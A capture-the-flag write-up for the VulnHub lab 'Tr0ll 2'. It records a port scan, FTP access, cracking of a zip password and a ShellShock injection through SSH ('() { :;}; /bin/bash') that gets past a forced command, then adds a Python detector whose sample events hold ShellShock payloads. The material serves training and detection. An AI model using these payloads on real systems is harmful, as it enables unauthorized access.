NOTES ABOUT Tr0ll 2

[ 2022-09-26 ] [ VulnHub / Tr0ll 2 ]

Status: Ongoing - inside as user
Skills: Port Scanning, FTP, Zip Cracking, SSH, ShellShock
Tools: nmap, strings, fcrackzip, ftp

PORT SCANNING

$ nmap -v -sS -A -p- 10.0.2.7

[...]
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 82:fe:93:b8:fb:38:a6:77:b5:a6:25:78:6b:35:e2:a8 (DSA)
| 2048 7d:a5:99:b8:fb:67:65:c9:64:86:aa:2c:d6:ca:08:5d (RSA)
|_ 256 91:b8:6a:45:be:41:fd:c8:14:b5:02:a0:66:7c:8c:96 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.2.22 (Ubuntu)
[...]

GETTING IN

$ strings cat_the_troll.jpg 
[...]
Look Deep within y0ur_self for the answer

$ wget http://10.0.2.7/y0ur_self/answer.txt
$ cat answer.txt | base64 -d > answer2.txt

$ ftp Tr0ll@10.0.2.7
Connected to 10.0.2.7.
220 Welcome to Tr0ll FTP... Only noobs stay for a while...
331 Please specify the password.
Password: Tr0ll
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||7387|).
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 1474 Oct 04 2014 lmao.zip
226 Directory send OK.
ftp> get lmao.zip
local: lmao.zip remote: lmao.zip
229 Entering Extended Passive Mode (|||18218|).
150 Opening BINARY mode data connection for lmao.zip (1474 bytes).
100% |********************************| 1474 22.31 MiB/s 00:00 ETA
226 Transfer complete.
1474 bytes received in 00:00 (1.33 MiB/s)
ftp> quit
221 Goodbye.

$ fcrackzip -v -D -u -p ./answer2.txt lmao.zip 
found file 'noob', (size cp/uc 1300/ 1679, flags 9, chk 1005)


PASSWORD FOUND!!!!: pw == ItCantReallyBeThisEasyRightLOL

$ unzip lmao.zip
Archive: lmao.zip
[lmao.zip] noob password:
inflating: noob

$ file noob
noob: PEM RSA private key

$ ssh -i ./noob noob@10.0.2.7 
sign_and_send_pubkey: no mutual signature supported
[...]
noob@10.0.2.7: Permission denied (publickey,password).

$ ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa' -i ./noob noob@10.0.2.7
TRY HARDER LOL!
Connection to 10.0.2.7 closed.
(the first attempt fails because current OpenSSH clients no longer offer SHA-1 ssh-rsa signatures by default; the option re-enables them for this old 5.9 server. The banner plus immediate disconnect, with no shell, is what a key bound to a forced command on the server side looks like.)

$ ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa' -i ./noob noob@10.0.2.7 '() { :;}; /bin/bash'
python -c 'import pty; pty.spawn("/bin/bash")'
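Why the last step works: when a key is bound to a forced command, sshd hands the client's requested command to that command through the SSH_ORIGINAL_COMMAND environment variable, and a bash that is still vulnerable to ShellShock parses any environment value starting with "() {" as a function definition and then executes whatever follows the closing brace. Added example, not part of the original notes: a small Python detector for that marker, run over a few constructed log-style values (the sources, field names and sample strings are made up for the illustration). The check is deliberately looser than bash's own literal "() {" prefix test so that spacing variants are flagged as well.

```python
import re

# Pre-patch bash treated any environment variable whose value starts with the
# exported-function marker "() {" as a function definition and kept executing
# past the closing brace. Bash's own test was the literal 4-byte prefix
# "() {"; this regex allows optional whitespace so spacing variants are also
# caught (an assumption of this example, not bash's exact rule).
_SHELLSHOCK_MARKER = re.compile(r"^\s*\(\)\s*\{")


def looks_like_shellshock(value):
    """Return True if a header/command value carries the ShellShock marker.

    The marker must be at the *start* of the value: "foo () { :;}" is a
    harmless string, because bash never treated it as a function body.
    """
    return bool(_SHELLSHOCK_MARKER.match(value))


def extract_payload(value):
    """Return the command text that would have run after the function body,
    or None if the value does not carry the marker. Lets an analyst see what
    was attempted without executing anything."""
    m = re.match(r"^\s*\(\)\s*\{[^}]*\}\s*;?\s*(.*)$", value)
    if not m:
        return None
    return m.group(1).strip()


def scan_events(events):
    """events: iterable of (source, field, value) triples.
    Returns a list of (source, field, payload) for every flagged value."""
    hits = []
    for source, field, value in events:
        if looks_like_shellshock(value):
            hits.append((source, field, extract_payload(value)))
    return hits


# Constructed sample events (not real logs). The sshd entry mirrors the
# command used above, as sshd would expose it to a forced command via
# SSH_ORIGINAL_COMMAND; the httpd entries show the same marker in headers.
SAMPLE_EVENTS = [
    ("sshd", "SSH_ORIGINAL_COMMAND", "() { :;}; /bin/bash"),
    ("httpd", "User-Agent", "() { :; }; /usr/bin/id"),
    ("httpd", "User-Agent", "Mozilla/5.0 (X11; Linux x86_64)"),
    ("httpd", "Referer", "https://example.test/docs?f=function f() { return 1; }"),
    ("sshd", "SSH_ORIGINAL_COMMAND", "ls -la"),
]

if __name__ == "__main__":
    for source, field, payload in scan_events(SAMPLE_EVENTS):
        print(f"[{source}] {field}: ShellShock marker, trailing command: {payload!r}")
```

Note that a forced command is not a sandbox when the command (or anything it calls) is a vulnerable bash: the fix is a patched bash, and the detector above is only there to surface attempts in collected headers or wrapper logs.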